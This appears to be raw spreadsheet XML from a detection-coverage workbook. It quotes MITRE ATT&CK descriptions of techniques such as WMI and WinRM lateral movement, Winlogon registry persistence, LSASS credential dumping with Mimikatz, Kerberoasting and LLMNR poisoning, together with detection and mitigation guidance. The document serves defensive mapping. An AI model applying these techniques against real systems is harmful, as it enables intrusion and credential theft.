      </rPr>
      <t>Windows Management Instrumentation</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>. Adversaries can also use NTLM hashes to access administrator shares on systems with </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Pass the Hash</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> and certain configuration and patch levels.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>348</t>
    </r>
  </si>
  <si>
    <r>
      <t>The </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Net</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> utility can be used to connect to Windows admin shares on remote systems using </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Courier New"/>
        <family val="3"/>
      </rPr>
      <t>net use</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> commands with valid credentials.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>219</t>
    </r>
  </si>
  <si>
    <t>T1047</t>
  </si>
  <si>
    <r>
      <t>Windows Management Instrumentation (WMI) is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB)</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>346</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> and Remote Procedure Call Service (RPCS)</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>347</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> for remote access. RPCS operates over port 135.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>349</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> An adversary can use WMI to interact with local and remote systems and use it as a means to perform many tactic functions, such as gathering information for </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Discovery</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> and remote </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Execution</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> of files as part of </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Lateral Movement</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>350</t>
    </r>
  </si>
  <si>
    <t>T1084</t>
  </si>
  <si>
    <r>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t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>351</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Examples of events that may be subscribed to are the wall clock time or the computer's uptime.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>352</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> Several threat groups have reportedly used this technique to maintain persistence.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>353</t>
    </r>
  </si>
  <si>
    <t>T1028</t>
  </si>
  <si>
    <r>
      <t>Windows Remote Management (WinRM) is the name of both a Windows service and a protocol that allows a user to interact with a remote system (e.g., run an executable, modify the Registry, modify services).</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>354</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> It may be called with the </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Courier New"/>
        <family val="3"/>
      </rPr>
      <t>winrm</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> command or by any number of programs such as PowerShell.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>355</t>
    </r>
  </si>
  <si>
    <t>T1004</t>
  </si>
  <si>
    <t>Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete. Registry entries in HKLM\Software\[Wow6432Node\]Microsoft\Windows NT\CurrentVersion\Winlogon\ and HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\ are used to manage additional helper programs and functionalities that support Winlogon.356</t>
  </si>
  <si>
    <t>Malicious modifications to these Registry keys may cause Winlogon to load and execute malicious DLLs and/or executables. Specifically, the following subkeys have been known to be possibly vulnerable to abuse:356</t>
  </si>
  <si>
    <t>Winlogon\Notify - points to notification package DLLs that handle Winlogon events</t>
  </si>
  <si>
    <t>Winlogon\Userinit - points to userinit.exe, the user initialization program executed when a user logs on</t>
  </si>
  <si>
    <t>Winlogon\Shell - points to explorer.exe, the system shell executed when a user logs on</t>
  </si>
  <si>
    <t>Adversaries may take advantage of these features to repeatedly execute malicious code and establish Persistence.</t>
  </si>
  <si>
    <t>Detection Method</t>
  </si>
  <si>
    <t>Audit Check</t>
  </si>
  <si>
    <t>Hunting</t>
  </si>
  <si>
    <t>SIEM</t>
  </si>
  <si>
    <t>Query</t>
  </si>
  <si>
    <t>EndGame Preso</t>
  </si>
  <si>
    <t>https://www.youtube.com/watch?v=w_kByDwB6J0</t>
  </si>
  <si>
    <t>Statistics</t>
  </si>
  <si>
    <t>Event ID</t>
  </si>
  <si>
    <t>Description</t>
  </si>
  <si>
    <t>Category</t>
  </si>
  <si>
    <t>Quantity</t>
  </si>
  <si>
    <t>ID No.</t>
  </si>
  <si>
    <t>Percent</t>
  </si>
  <si>
    <t>High</t>
  </si>
  <si>
    <t>Med</t>
  </si>
  <si>
    <t>Low</t>
  </si>
  <si>
    <t>EDR</t>
  </si>
  <si>
    <t>LOG-MD</t>
  </si>
  <si>
    <t>Packet Capture</t>
  </si>
  <si>
    <t>Medium Confidence or 
Coverage</t>
  </si>
  <si>
    <t>High
Confidence or 
Covereage</t>
  </si>
  <si>
    <t>Low or No
Confidence or Covereage</t>
  </si>
  <si>
    <t>Sysmon</t>
  </si>
  <si>
    <t>Suppliment with</t>
  </si>
  <si>
    <t>Log Mgmt</t>
  </si>
  <si>
    <t>Packet</t>
  </si>
  <si>
    <t>Logs</t>
  </si>
  <si>
    <t>Tactic</t>
  </si>
  <si>
    <t>TechniqueName</t>
  </si>
  <si>
    <t>TechniqueID</t>
  </si>
  <si>
    <t>Data Source 1</t>
  </si>
  <si>
    <t>Data Source 2</t>
  </si>
  <si>
    <t>Data Source 3</t>
  </si>
  <si>
    <t>Data Source 4</t>
  </si>
  <si>
    <t>Data Source 5</t>
  </si>
  <si>
    <t>Data Source 6</t>
  </si>
  <si>
    <t>Data Source 7</t>
  </si>
  <si>
    <t>Data Source 8</t>
  </si>
  <si>
    <t>Data Source 9</t>
  </si>
  <si>
    <t>Data Source 10</t>
  </si>
  <si>
    <t>Data Source 11</t>
  </si>
  <si>
    <t>Data Source 12</t>
  </si>
  <si>
    <t>Query Summary</t>
  </si>
  <si>
    <t>Analytic Details</t>
  </si>
  <si>
    <t>URL</t>
  </si>
  <si>
    <t>Mitigation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</si>
  <si>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 ,</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1123</t>
  </si>
  <si>
    <t>Mitigating this technique specifically may be difficult as it requires fine-grained API control. Efforts should be focused on preventing unwanted or unknown code from executing on a system.
Identify and block potentially malicious software that may be used to record audio by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</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</si>
  <si>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[[T1074|Data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[[T1047|Windows Management Instrumentation]] and [[T1086|PowerShell]]. ,</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1119</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</si>
  <si>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A keylogger installed on a system may be able to intercept passwords through [[T1056|Input Capture]] and be used to decrypt protected documents that an adversary may have collected. Strong passwords should be used to prevent offline cracking of encrypted documents through [[T1110|Brute Force]] techniques.
Identify unnecessary system utilities, third-party tools, or potentially malicious software that may be used to collect files and audit and/or block them by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</t>
  </si>
  <si>
    <t>Access to the clipboard is a legitimate function of many applications on a Windows system. If an organization chooses to monitor for this behavior, then the data will likely need to be correlated against other suspicious or non-user-driven activity. ,</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1115</t>
  </si>
  <si>
    <t>Instead of blocking software based on clipboard capture behavior, identify potentially malicious software that may contain this functionality, and audit and/or block it by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</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</si>
  <si>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documents.[[CiteRef::Microsoft SharePoint Logging]] The user user access logging within Atlassian's Confluence can also be configured to report access to certain pages and documents through AccessLogFilter.[[CiteRef::Atlassian Confluence Logging]] Additional log storage and analysis infrastructure will likely be required for more robust detection capabilities. ,</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1213</t>
  </si>
  <si>
    <t>To mitigate adversary access to information repositories for collection:
* Develop and publish policies that define acceptable information to be stored
* Appropriate implementation of access control mechanisms that include both authentication and appropriate authorization
* Enforce the principle of least-privilege
* Periodic privilege review of accounts
* Mitigate access to [[T1078|Valid Accounts]] that may be used to access repositories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</si>
  <si>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[[T1047|Windows Management Instrumentation]] and [[T1086|PowerShell]]. ,</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1005</t>
  </si>
  <si>
    <t>Identify unnecessary system utilities or potentially malicious software that may be used to collect data from the local system, and audit and/or block them by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</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</si>
  <si>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[[T1047|Windows Management Instrumentation]] and [[T1086|PowerShell]]. ,</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1039</t>
  </si>
  <si>
    <t>Identify unnecessary system utilities or potentially malicious software that may be used to collect data from a network share, and audit and/or block them by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</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</si>
  <si>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[[T1047|Windows Management Instrumentation]] and [[T1086|PowerShell]]. ,</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1025</t>
  </si>
  <si>
    <t>Identify unnecessary system utilities or potentially malicious software that may be used to collect data from removable media, and audit and/or block them by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</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</si>
  <si>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[[T1047|Windows Management Instrumentation]] and [[T1086|PowerShell]]. ,</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1074</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/wiki/T1114</t>
  </si>
  <si>
    <t>Use of encryption provides an added layer of security to sensitive information sent over email. Encryption using public key cryptography requires the adversary to obtain the private certificate along with an encryption key to decrypt messages.
Use of two-factor authentication for public-facing webmail servers is also a recommended best practice to minimize the usefulness of user names and passwords to adversaries.
Identify unnecessary system utilities or potentially malicious software that may be used to collect email data files or access the corporate email server, and audit and/or block them by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</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</si>
  <si>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 ,</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1185</t>
  </si>
  <si>
    <t>Since browser pivoting requires a high integrity process to launch from, restricting user permissions and addressing [[Privilege Escalation]] and [[T1088|Bypass User Account Control]] opportunities can limit the exposure to this technique. 
Close all browser sessions regularly and when they are no longer needed.</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</si>
  <si>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 ,</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1113</t>
  </si>
  <si>
    <t>Blocking software based on screen capture functionality may be difficult, and there may be legitimate software that performs those actions. Instead, identify potentially malicious software that may have functionality to acquire screen captures, and audit and/or block it by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</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</si>
  <si>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 ,</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1125</t>
  </si>
  <si>
    <t>Mitigating this technique specifically may be difficult as it requires fine-grained API control. Efforts should be focused on preventing unwanted or unknown code from executing on a system.
Identify and block potentially malicious software that may be used to capture video and images by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</t>
  </si>
  <si>
    <t>Collection,Credential Access</t>
  </si>
  <si>
    <t>Keyloggers may take many forms, possibly involving modification to the Registry and installation of a driver, setting a hook, or polling to intercept keystrokes. Commonly used API calls include SetWindowsHook, GetKeyState, and GetAsynceyState.[[CiteRef::Adventures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Provider.[[CiteRef::Wrightson 2012]] Detection of compromised [[T1078|Valid Accounts]] in use by adversaries may help to catch the result of user input interception if new techniques are used. ,</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1056</t>
  </si>
  <si>
    <t>Identify and block potentially malicious software that may be used to acquire credentials or information from the user by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]
In cases where this behavior is difficult to detect or mitigate, efforts can be made to lessen some of the impact that might result from an adversary acquiring credential information. It is also good practice to follow mitigation recommendations for adversary use of [[T1078|Valid Accounts]].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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/wiki/T1043</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</si>
  <si>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</si>
  <si>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Monitor file access on removable media. Detect processes that execute when removable media is mounted. ,</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1092</t>
  </si>
  <si>
    <t>Disable Autorun if it is unnecessary.[[CiteRef::Microsoft Disable Autorun]] Disallow or restrict removable media at an organizational policy level if they are not required for business operations.[[CiteRef::TechNet Removable Media Control]]</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/wiki/T1090</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/wiki/T1094</t>
  </si>
  <si>
    <t>If malware uses custom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used.[[CiteRef::University of Birmingham C2]] ,</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1024</t>
  </si>
  <si>
    <t>Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. Since the custom protocol used may not adhere to typical protocol standards, there may be opportunities to signature the traffic on a network level for detection.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</si>
  <si>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https://attack.mitre.org/wiki/T1132</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/wiki/T1001</t>
  </si>
  <si>
    <t>If SSL inspection is in place or the traffic is not encrypted, the Host field of the HTTP header can be checked if it matches the HTTPS SNI or against a blacklist or whitelist of domain names.[[CiteRef::Fifield Blocking Resistent Communication through domain fronting 2015]] ,</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1172</t>
  </si>
  <si>
    <t>If it is possible to inspect HTTPS traffic, the captures can be analyzed for connections that appear to be Domain Fronting.
In order to use domain fronting, attackers will likely need to deploy additional tools to compromised systems.[[CiteRef::FireEye APT29 Domain Fronting With TOR March 2017]][[CiteRef::Mandiant No Easy Breach]] It may be possible to detect or prevent the installation of these tools with Host-based solutions.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1008</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</si>
  <si>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Correlating alerts between multiple communication channels can further help identify command-and-control behavior. ,</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1026</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</si>
  <si>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[[Software/S0183|Tor]]) or known adversary infrastructure that uses this technique. ,</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1188</t>
  </si>
  <si>
    <t>Traffic to known anonymity networks and C2 infrastructure can be blocked through the use of network black and white lists. It should be noted that this kind of blocking may be circumvented by other techniques like [[T1172|Domain Fronting]].</t>
  </si>
  <si>
    <t>If malware uses [[T1032|Standard Cryptographic Protocol]], SSL/TLS inspection can be used to detect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After SSL/TLS inspection, additional cryptographic analysis may be needed to analyze the second layer of encryption.
With [[T1024|Custom Cryptographic Protocol]],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</si>
  <si>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https://attack.mitre.org/wiki/T1079</t>
  </si>
  <si>
    <t>Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. Use of encryption protocols may make typical network-based C2 detection more difficult due to a reduced ability to signature the traffic. Prior knowledge of adversary C2 infrastructure may be useful for domain and IP address blocking, but will likely not be an effective long-term solution because adversaries can change infrastructure often.[[CiteRef::University of Birmingham C2]]</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</si>
  <si>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 ,</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1104</t>
  </si>
  <si>
    <t>Command and control infrastructure used in a multi-stage channel may be blocked if known ahead of time. If unique signatures are present in the C2 traffic, they could also be used as the basis of identifying and blocking the channel.[[CiteRef::University of Birmingham C2]]</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</si>
  <si>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[[T1172|Domain Fronting]] may be used in conjunction to avoid defenses. Adversaries will likely need to deploy and/or install these remote tools to compromised systems. It may be possible to detect or prevent the installation of these tools with host-based solutions. ,</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1219</t>
  </si>
  <si>
    <t>Properly configure firewalls, application firewalls, and proxies to limit outgoing traffic to sites and services used by remote access tools.
Network intrusion detection and prevention systems that use network signatures may be able to prevent traffic to these services as well.
Use application whitelisting to mitigate use of and installation of unapproved software.</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</si>
  <si>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used.[[CiteRef::University of Birmingham C2]] ,</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1071</t>
  </si>
  <si>
    <t>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to avoid detection by common defensive tools.[[CiteRef::University of Birmingham C2]]</t>
  </si>
  <si>
    <t>SSL/TLS inspection is one way of detecting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</si>
  <si>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https://attack.mitre.org/wiki/T1032</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/wiki/T1095</t>
  </si>
  <si>
    <t>Properly configure firewalls and proxies to limit outgoing traffic to only necessary ports and through proper network gateway systems.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</si>
  <si>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https://attack.mitre.org/wiki/T1065</t>
  </si>
  <si>
    <t>Properly configure firewalls and proxies to limit outgoing traffic to only necessary ports.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</si>
  <si>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Command and Control,Defense Evasion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</si>
  <si>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 Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.[[CiteRef::University of Birmingham C2]] ,</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1102</t>
  </si>
  <si>
    <t>Firewalls and Web proxies can be used to enforce external network communication policy. It may be difficult for an organization to block particular services because so many of them are commonly used during the course of business.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or encoded commands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</si>
  <si>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Command and Control,Lateral Movement</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/wiki/T1105</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</si>
  <si>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</si>
  <si>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Collect events that correlate with changes to account objects on systems and the domain, such as event ID 4738.[[CiteRef::Microsoft User Modified Event]] Monitor for modification of accounts in correlation with other suspicious activity. Changes may occur at unusual times or from unusual systems. Especially flag events where the subject and target accounts differ[[CiteRef::InsiderThreat ChangeNTLM July 2017]] or that include additional flags such as changing a password without knowledge of the old password.[[CiteRef::GitHub Mimikatz Issue 92 June 2017]]
Use of credentials may also occur at unusual times or to unusual systems or services and may correlate with other suspicious activity. ,</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1098</t>
  </si>
  <si>
    <t>Use multifactor authentication. Follow guidelines to prevent or limit adversary access to [[T1078|Valid Accounts]].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</si>
  <si>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It is difficult to detect when hashes are cracked, since this is generally done outside the scope of the target network. 
Monitor authentication logs for system and application login failures of [[T1078|Valid Accounts]]. If authentication failures are high, then there may be a brute force attempt to gain access to a system using legitimate credentials.
Also monitor for many failed authentication attempts across various accounts that may result from password spraying attempts. ,</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1110</t>
  </si>
  <si>
    <t>Set account lockout policies after a certain number of failed login attempts to prevent passwords from being guessed. Use multifactor authentication. Follow best practices for mitigating access to [[T1078|Valid Accounts]]</t>
  </si>
  <si>
    <t>Common credential dumpers such as [[Software/S0002|Mimikatz]] access the LSA Subsystem Service (LSASS) process by opening the process, locating the LSA secrets key, and decrypting the sections in memory where credential details are stored. Credential dumpers may also use methods for reflective [[T1055|Process Injection]]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[[T1078|Valid Accounts]]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[[Software/S0002|Mimikatz]]. [[T1086|PowerShell]] scripts also exist that contain credential dumping functionality, such as PowerSploit's Invoke-Mimikatz module,[[CiteRef::Powersploit]] which may require additional logging features to be configured in the operating system to collect necessary information for analysis.
Monitor domain controller logs for replication requests and other unscheduled activity possibly associated with DCSync.[[CiteRef::Microsoft DRSR Dec 2017]][[CiteRef::Microsoft GetNCCChanges]][[CiteRef::Samba DRSUAPI]] Note: Domain controllers may not log replication requests originating from the default domain controller account.[[CiteRef::Harmj0y DCSync Sept 2015]]. Also monitor for network protocols [[CiteRef::Microsoft DRSR Dec 2017]][[CiteRef::Microsoft NRPC Dec 2017]] and other replication requests[[CiteRef::Microsoft SAMR]] from IPs not associated with known domain controllers. [[CiteRef::AdSecurity DCSync Sept 2015]] ,</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1003</t>
  </si>
  <si>
    <t>Monitor/harden access to LSASS and SAM table with tools that allow process whitelisting. Limit credential overlap across systems to prevent lateral movement opportunities using [[T1078|Valid Accounts]] if passwords and hashes are obtained. Ensure that local administrator accounts have complex, unique passwords across all systems on the network.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tiers.[[CiteRef::Microsoft Securing Privileged Access]]
On Windows 8.1 and Windows Server 2012 R2, enable Protected Process Light for LSA.[[CiteRef::Microsoft LSA]]
Identify and block potentially malicious software that may be used to dump credentials by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]
With Windows 10, Microsoft implemented new protections called Credential Guard to protect the LSA secrets that can be used to obtain credentials through forms of credential dumping. It is not configured by default and has hardware and firmware system requirements.[[CiteRef::TechNet Credential Guard]] It also does not protect against all forms of credential dumping.[[CiteRef::GitHub SHB Credential Guard]]
Manage the access control list for ?Replicating Directory Changes? and other permissions associated with domain controller replication.[[CiteRef::AdSecurity DCSync Sept 2015]][[CiteRef::Microsoft Replication ACL]]
Consider disabling or restricting NTLM traffic.[[CiteRef::Microsoft Disable NTLM Nov 2012]]</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</si>
  <si>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[[T1078|Valid Accounts]] for more information. ,</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1081</t>
  </si>
  <si>
    <t>Establish an organizational policy that prohibits password storage in files. Ensure that developers and system administrators are aware of the risk associated with having plaintext passwords in software configuration files that may be left on endpoint systems or servers. Preemptively search for files containing passwords and remove when found. Restrict file shares to specific directories with access only to necessary users. Remove vulnerable Group Policy Preferences.[[CiteRef::Microsoft MS14-025]]</t>
  </si>
  <si>
    <t>Monitor processes for applications that can be used to query the Registry, such as [[Software/S0075|Reg]], and collect command parameters that may indicate credentials are being searched. Correlate activity with related suspicious behavior that may indicate an active intrusion to reduce false positives. ,</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1214</t>
  </si>
  <si>
    <t>Do not store credentials within the Registry. Proactively search for credentials within Registry keys and attempt to remediate the risk. If necessary software must store credentials, then ensure those accounts have limited permissions so they cannot be abused if obtained by an adversary.</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</si>
  <si>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 ,</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1212</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</si>
  <si>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if available. Other types of virtualization and application microsegmentation may also mitigate the impact of some types of exploitation. The risks of additional exploits and weaknesses in implementation may still exist.[[CiteRef::Ars Technica Pwn2Own 2017 VM Escape]]
Security applications that look for behavior used during exploitation such as Windows Defender Exploit Guard (WDEG) and the Enhanced Mitigation Experience Toolkit (EMET) can be used to mitigate some exploitation behavior.[[CiteRef::TechNet Moving Beyond EMET]] Control flow integrity checking is another way to potentially identify and stop a software exploit from occurring.[[CiteRef::Wikipedia Control Flow Integrity]] Many of these protections depend on the architecture and target application binary for compatibility and may not work for software targeted for defense evasion.</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</si>
  <si>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rendered.[[CiteRef::US-CERT APT Energy Oct 2017]] ,</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1187</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</si>
  <si>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whitelisting.[[CiteRef::US-CERT SMB Security]][[CiteRef::US-CERT APT Energy Oct 2017]]
For internal traffic, monitor the workstation-to-workstation unusual (vs. baseline) SMB traffic. For many networks there should not be any, but it depends on how systems on the network are configured and where resources are located.
Use strong passwords to increase the difficulty of credential hashes from being cracked if they are obtained.</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</si>
  <si>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0x17]).[[CiteRef::Microsoft Detecting Kerberoasting Feb 2018]][[CiteRef::AdSecurity Cracking Kerberos Dec 2015]] ,</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1208</t>
  </si>
  <si>
    <t>Ensure strong password length (ideally 25+ characters) and complexity for service accounts and that these passwords periodically expire.[[CiteRef::AdSecurity Cracking Kerberos Dec 2015]] Also consider using Group Managed Service Accounts or another third party product such as password vaulting.[[CiteRef::AdSecurity Cracking Kerberos Dec 2015]]
Limit service accounts to minimal required privileges, including membership in privileged groups such as Domain Administrators.[[CiteRef::AdSecurity Cracking Kerberos Dec 2015]]
Enable AES Kerberos encryption (or another stronger encryption algorithm), rather than RC4, where possible.[[CiteRef::AdSecurity Cracking Kerberos Dec 2015]]</t>
  </si>
  <si>
    <t>Monitor &lt;code&gt;HKLM\Software\Policies\Microsoft\Windows NT\DNSClient&lt;/code&gt; for changes to the "EnableMulticast" DWORD value. A value of ?0? indicates LLMNR is disabled.[[CiteRef::Sternsecurity LLMNR-NBTNS]]
Monitor for traffic on ports UDP 5355 and UDP 137 if LLMNR/NetBIOS is disabled by security policy.
Deploy an LLMNR/NBT-NS spoofing detection tool.[[CiteRef::GitHub Conveigh]] ,</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1171</t>
  </si>
  <si>
    <t>Disable LLMNR and NetBIOS in local computer security settings or by group policy if they are not needed within an environment.[[CiteRef::ADSecurity Windows Secure Baseline]]
Use host-based security software to block LLMNR/NetBIOS traffic.</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</si>
  <si>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t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1040</t>
  </si>
  <si>
